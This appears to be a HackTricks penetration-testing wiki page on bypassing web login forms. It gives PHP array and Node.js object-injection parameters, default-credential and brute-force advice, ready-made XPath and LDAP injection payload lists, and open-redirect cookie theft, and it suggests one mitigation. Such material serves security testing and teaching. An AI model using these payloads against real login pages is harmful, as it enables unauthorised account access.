{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
RootedCON is the most relevant cybersecurity event in Spain and one of the most important in Europe. With the mission of promoting technical knowledge, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
{% embed url="https://www.rootedcon.com/" %}
If you find a login page, here you can find some techniques to try to bypass it:
- Check for comments inside the page (scroll down and to the right?)
- Check if you can directly access the restricted pages
- Check to not send the parameters (do not send any or only 1)
- Check the PHP comparisons error:
user[]=a&pwd=b
,user=a&pwd[]=b
,user[]=a&pwd[]=b
- Change content type to json and send json values (bool true included)
- If you get a response saying that POST is not supported you can try to send the JSON in the body but with a GET request with
Content-Type: application/json
- If you get a response saying that POST is not supported you can try to send the JSON in the body but with a GET request with
- Check nodejs potential parsing error (read this):
password[password]=1
- Nodejs will transform that payload to a query similar to the following one:
SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` ``
password=password=1
;
which makes the password bit to be always true. - If you can send a JSON object you can send
"password":{"password": 1}
to bypass the login. - Remember that to bypass this login you still need to know and send a valid username.
- Adding
"stringifyObjects":true
option when callingmysql.createConnection
will eventually block all unexpected behaviours whenObject
is passed in the parameter.
- Nodejs will transform that payload to a query similar to the following one:
- Check credentials:
- Default credentials of the technology/platform used
- Common combinations (root, admin, password, name of the tech, default user with one of these passwords).
- Create a dictionary using Cewl, add the default username and password (if there is) and try to brute-force it using all the words as usernames and password
- Brute-force using a bigger dictionary (Brute force)
Here you can find several tricks to bypass the login via SQL injections.
In the following page you can find a custom list to try to bypass login via SQL Injections:
{% content-ref url="sql-login-bypass.md" %} sql-login-bypass.md {% endcontent-ref %}
Here you can find several tricks to bypass the login via No SQL Injections.
As the NoSQL Injections requires to change the parameters value, you will need to test them manually.
Here you can find several tricks to bypass the login via XPath Injection.
' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2
Here you can find several tricks to bypass the login via LDAP Injection.
*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(&)
pwd
admin)(!(&(|
pwd))
admin))(|(|
If the page has "Remember Me" functionality check how is it implemented and see if you can abuse it to takeover other accounts.
Pages usually redirects users after login, check if you can alter that redirect to cause an Open Redirect. Maybe you can steal some information (codes, cookies...) if you redirect the user to your web.
- Check if you can enumerate usernames abusing the login functionality.
- Check if auto-complete is active in the password/sensitive information forms input:
<input autocomplete="false"
RootedCON is the most relevant cybersecurity event in Spain and one of the most important in Europe. With the mission of promoting technical knowledge, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
{% embed url="https://www.rootedcon.com/" %}
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.